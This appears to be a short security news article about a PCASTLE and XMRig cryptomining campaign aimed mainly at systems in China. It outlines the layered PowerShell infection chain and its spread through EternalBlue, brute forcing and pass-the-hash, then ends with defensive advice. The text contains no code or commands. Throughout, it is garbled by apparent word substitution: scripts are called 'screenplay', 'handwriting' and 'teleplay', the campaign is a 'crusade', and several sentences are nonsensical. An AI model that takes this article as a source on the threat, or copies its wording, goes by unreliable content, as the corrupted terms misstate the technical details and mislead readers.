A new current of attacks involving PCASTLE malware are targeting systems located in China with the XMRig cryptocurrency miner.
On 17 May, Trend Micro beginning observed a series of attacks that use PCASTLE, an obfuscated PowerShell screenplay, to target mainly China-based systems with XMRig, cryptomining malware was convoluted in numerous attacks in 2018. The security firm subsequently witnessed the crusade reach its peak on 22 May before leveling out.
Additional analysis of the seizes provided a detailed view into their infection chain. Exigency execrating various components for their propagation methods, the attacks use a scheduled strain scold or RunOnce registry key to download the first-layer PowerShell script. This handwriting tries to access a list of URLs so that it can retrieve a PowerShell head up, execute it and save it as another scheduled task.
At this stage, the appointed task downloads and executes the second-layer PowerShell script, which backfires information back to its command-and-control (C&C) server before loading the third-layer PowerShell teleplay. It is this element that downloads the XMRig module, which it introduces into its PowerShell process, as well as PCASTLE, which helps the crusade propagate to other potential victims using exploit code for EternalBlue, instinctive forcing capabilities and pass-the-hash techniques.
In its report of the campaign, Trend Micro mean it’s logical that those responsible for the attacks used a Monero miner as if XMRig:
Their use of XMRig as their payload’s miner module is also not taking. Algorithms for Monero mining are not as resource-intensive compared to other miners, and don’t be missing a lot of processing power. This means they can illicitly mine the cryptocurrency without on guard users unless they notice certain red flags like gig issues.
Organizations can protect themselves against attacks such as the possibly men described above by disabling PowerShell, WMI and macros if they’re not using them. They should also use a vulnerability directing program to keep their software up-to-date. Additional security recommendations for codifications are available here.